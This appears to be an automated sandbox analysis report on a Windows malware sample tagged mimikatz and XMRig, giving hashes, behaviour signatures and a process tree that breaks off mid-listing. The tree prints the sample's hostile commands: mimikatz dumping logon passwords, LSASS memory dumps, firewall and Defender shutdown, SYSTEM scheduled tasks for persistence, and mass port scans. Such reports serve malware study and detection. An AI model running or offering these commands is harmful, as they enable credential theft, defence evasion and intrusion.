Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 06:34

General

  • Target

    2024-11-11_7d03b3c06a12e13d81e99a42b60e91eb_hacktools_icedid_mimikatz.exe

  • Size

    7.2MB

  • MD5

    7d03b3c06a12e13d81e99a42b60e91eb

  • SHA1

    634419d207cfb139f5b6cb469765d8b46fe441c4

  • SHA256

    cec910c0443a9338c2757b14087ce2389e373811d03b7b94c1c4dae5868f0b64

  • SHA512

    dc673ee2199cb37b7203877d00754ffa48c276fd6f8c32cf309710cb85f2d8cced34e7c6eb8841b3210e95afddc80f8dc627d6c47b6cb05ec53b254f5245d412

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30030) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2148
      • C:\Windows\TEMP\stjqapuut\ejzklm.exe
        "C:\Windows\TEMP\stjqapuut\ejzklm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3620
    • C:\Users\Admin\AppData\Local\Temp\2024-11-11_7d03b3c06a12e13d81e99a42b60e91eb_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-11-11_7d03b3c06a12e13d81e99a42b60e91eb_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3840
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uzepkltb\zyejeil.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4092
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2300
        • C:\Windows\uzepkltb\zyejeil.exe
          C:\Windows\uzepkltb\zyejeil.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4212
    • C:\Windows\uzepkltb\zyejeil.exe
      C:\Windows\uzepkltb\zyejeil.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3060
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4196
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2064
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4764
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4592
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3048
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4224
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
              PID:452
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1528
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2192
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1360
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe
              C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1364
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4468
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4620
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3064
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4284
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1328
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4776
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                  PID:4148
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2736
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:3272
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3236
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2300
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2948
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1388
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2536
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt
              2⤵
              • System Location Discovery: System Language Discovery
              PID:4088
              • C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe
                C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lrcwzntnt\bmkbibntg\Scant.txt
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:4652
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lrcwzntnt\Corporate\log.txt
              2⤵
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:1784
              • C:\Windows\lrcwzntnt\Corporate\vfshost.exe
                C:\Windows\lrcwzntnt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2036
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"
              2⤵
                PID:3604
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4256
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4388
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1560
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4192
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4804
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"
                2⤵
                  PID:1376
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3280
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:4472
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:968
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:3956
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3840
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3064
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:5108
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:544
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1900
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4568
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:3540
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:5080
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:2636
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3020
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:452
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:5012
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4656
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh firewall set opmode mode=disable
                  2⤵
                    PID:4032
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:4968
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3360
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3136
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2120
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4496
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop MpsSvc
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2444
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop WinDefend
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2192
                    • C:\Windows\SysWOW64\net.exe
                      net stop WinDefend
                      3⤵
                        PID:1784
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          4⤵
                            PID:4556
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop wuauserv
                        2⤵
                          PID:1200
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                              PID:1604
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:5056
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config MpsSvc start= disabled
                            2⤵
                              PID:1888
                              • C:\Windows\SysWOW64\sc.exe
                                sc config MpsSvc start= disabled
                                3⤵
                                • Launches sc.exe
                                PID:1280
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config SharedAccess start= disabled
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2964
                              • C:\Windows\SysWOW64\sc.exe
                                sc config SharedAccess start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2716
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config WinDefend start= disabled
                              2⤵
                                PID:1572
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config WinDefend start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:2236
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config wuauserv start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:4452
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  PID:3288
                              • C:\Windows\TEMP\xohudmc.exe
                                C:\Windows\TEMP\xohudmc.exe
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • Suspicious use of SetWindowsHookEx
                                PID:2980
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 796 C:\Windows\TEMP\lrcwzntnt\796.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:208
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 380 C:\Windows\TEMP\lrcwzntnt\380.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2064
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2148 C:\Windows\TEMP\lrcwzntnt\2148.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1528
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2652 C:\Windows\TEMP\lrcwzntnt\2652.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2284
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2776 C:\Windows\TEMP\lrcwzntnt\2776.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1096
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2972 C:\Windows\TEMP\lrcwzntnt\2972.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3868
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2984 C:\Windows\TEMP\lrcwzntnt\2984.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:904
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3752 C:\Windows\TEMP\lrcwzntnt\3752.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1444
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3848 C:\Windows\TEMP\lrcwzntnt\3848.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2720
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3912 C:\Windows\TEMP\lrcwzntnt\3912.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2820
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4020 C:\Windows\TEMP\lrcwzntnt\4020.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4532
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4160 C:\Windows\TEMP\lrcwzntnt\4160.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4224
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4624 C:\Windows\TEMP\lrcwzntnt\4624.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1720
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4784 C:\Windows\TEMP\lrcwzntnt\4784.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4732
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2296 C:\Windows\TEMP\lrcwzntnt\2296.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:540
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2104 C:\Windows\TEMP\lrcwzntnt\2104.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4276
                              • C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
                                C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4632 C:\Windows\TEMP\lrcwzntnt\4632.dmp
                                2⤵
                                • Executes dropped EXE
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:592
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c C:\Windows\lrcwzntnt\bmkbibntg\scan.bat
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:1796
                                • C:\Windows\lrcwzntnt\bmkbibntg\nusubcedp.exe
                                  nusubcedp.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
                                  3⤵
                                  • Executes dropped EXE
                                  • Drops file in Windows directory
                                  PID:3880
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:6104
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5188
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                  3⤵
                                    PID:1572
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2444
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2416
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1008
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4368
                              • C:\Windows\SysWOW64\umqeiy.exe
                                C:\Windows\SysWOW64\umqeiy.exe
                                1⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:4384
                              • C:\Windows\system32\cmd.EXE
                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
                                1⤵
                                  PID:2664
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    2⤵
                                      PID:2732
                                    • C:\Windows\system32\cacls.exe
                                      cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
                                      2⤵
                                        PID:4652
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c C:\Windows\ime\zyejeil.exe
                                      1⤵
                                        PID:4144
                                        • C:\Windows\ime\zyejeil.exe
                                          C:\Windows\ime\zyejeil.exe
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:1008
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
                                        1⤵
                                          PID:4968
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                            2⤵
                                              PID:3656
                                            • C:\Windows\system32\cacls.exe
                                              cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
                                              2⤵
                                                PID:3908
                                            • C:\Windows\system32\cmd.EXE
                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
                                              1⤵
                                                PID:4368
                                                • C:\Windows\system32\cmd.exe
